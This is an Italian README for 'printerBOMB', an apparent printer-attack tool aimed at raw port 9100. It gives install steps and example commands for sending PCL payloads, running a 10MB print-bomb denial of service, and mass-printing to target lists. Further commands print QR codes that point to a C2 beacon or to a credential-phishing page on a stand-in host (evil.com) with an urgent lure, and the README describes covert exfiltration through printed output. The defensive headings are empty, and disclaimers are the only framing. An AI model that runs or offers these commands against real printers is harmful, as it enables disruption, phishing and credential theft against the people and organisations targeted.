
Framework di sfruttamento delle stampanti per test di sicurezza tramite la porta raw 9100, con consegna di payload PCL, bombardamento DoS, codici QR C2, codici QR di phishing e marcatori di esfiltrazione occulta.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Framework di Attacco allo Spooling delle Stampanti
Sfruttare il vettore d'attacco trascurato: le tue stampanti di rete
Sviluppato da: Azhari Ramadhan 🔥
PrintHack è uno strumento sofisticato di sfruttamento delle stampanti progettato per professionisti della sicurezza, red teamer e penetration tester. Questo strumento sfrutta il protocollo raw di spooling delle stampanti (Porta 9100) per eseguire valutazioni di sicurezza, testare le vulnerabilità delle stampanti e simulare scenari d'attacco reali.
⚠️ DICHIARAZIONE: Questo strumento è destinato esclusivamente a test di sicurezza legittimi e scopi educativi. Usalo in modo responsabile e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Elaborazione immaginiqrcode - Generazione QR coderequests - Richieste HTTPpip install Pillow qrcode requests
# Testa la connettività della stampante
python3 printerhack.py -t 192.168.1.100 --check
# Invia una pagina di test
python3 printerhack.py -t 192.168.1.100 --test
# Stampa un messaggio personalizzato
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# Stampa un'immagine da URL (convertita in ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# Invia payload PCL
python3 printerhack.py -t 192.168.1.100 --pcl
# Print bomb (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# Stampa QR code di callback C2
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Stampa QR code di phishing
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# Stampa verso più stampanti da file
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
Stampa messaggi nascosti o istruzioni su stampanti compromesse in scenari di accesso fisico.
Stampa QR code che collegano a pagine di raccolta credenziali mascherate da avvisi di sicurezza.
Usa l'output della stampante come canale nascosto di esfiltrazione per dati codificati.
Testa la resilienza organizzativa contro attacchi denial of service basati su stampanti.
Enumera e identifica le stampanti attraverso la rete.
Indicatori di Rilevamento:
Strategie di Mitigazione:
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
I contributi sono benvenuti! Assicurati che:
Sviluppatore: Azhari Ramadhan 🔥
Licenza MIT - Vedi LICENSE per i dettagli
🖨️ printerBOMB - Sfruttare l'Ultima Linea di Difesa
Resta un passo avanti agli attaccanti pensando come loro
Realizzato con 🔥 da Azhari Ramadhan
| Funzionalità | Descrizione |
|---|
--check | Testa la connettività della stampante |
--test | Invia una pagina di test |
--message | Stampa payload personalizzati |
--image | Stampa un'immagine da URL (ASCII art) |
--pcl | Invia payload in formato PCL |
--bomb | Attacco DoS (payload massivo) |
--c2 | Stampa QR code di callback C2 |
--phish | Stampa QR code di phishing |
--exfil | Stampa marcatore di esfiltrazione dati |
--file | Stampa di massa verso più target |